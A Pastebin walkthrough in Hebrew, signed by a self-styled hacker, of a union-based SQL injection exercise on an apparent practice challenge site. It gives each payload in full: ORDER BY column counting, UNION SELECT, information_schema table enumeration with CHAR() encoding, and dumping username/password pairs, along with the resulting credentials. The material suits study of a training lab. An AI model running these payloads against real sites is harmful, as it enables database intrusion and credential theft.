Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- לאתר SQL תרגיל הזרקת
- SQL נחפש שגיאת
- http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
- ' " ; --'- : +--+ / : -- - : --+- : /*
- +order+by+100
- +order+by+100--
- +order+by+100--+
- +order+by+100--+-
- +'order+by+100--+-
- Unknown column '100' in 'order clause'
- נחפש כמה עמודות יש
- +'order+by+1--+-
- +'order+by+2--+-
- +'order+by+3--+-
- +'order+by+4--+- errer : Unknown column '4' in 'order clause'
- אנחנו מקבלים שגיאה ב-4 זה אומר שיש לנו 3 עמודות
- עכשיו נריץ אותם
- %27union+select+1,2,3--+-
- עכשיו מופיע לנו את מספר העמודה שפגיעה
- אצלי זה מספר 2
- נבדוק תגירסא ותשם של הבסיס נתונים
- database()
- user()
- version()
- עכשיו נשלוף את רשימת הטבלאות
- %27union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--+-
- זה מה שקיבלנו
- "testtable1,userlogs,users"
- CHAR(117, 115, 101, 114, 115)
- %27union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=CHAR(117,115,101,114,115)--+-
- users שלפנו את רשימת הטבלה
- table : users
- id,username,password,user_type,sec_code
- %27union+select+1,concat(username,0x2a,password),3+from+users--+-
- השמות משתמשים והסיסמאות
- Username is : injector*khan
- Username is : decompiler*hacktract
- Username is : devilhunte*dante
- Username is : Zen*sec-idiots
- Username is : Zenodermus*security-i
- Username is : grayhat*hacker
- Username is : khan*haxor
- Username is : admin*sadmin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement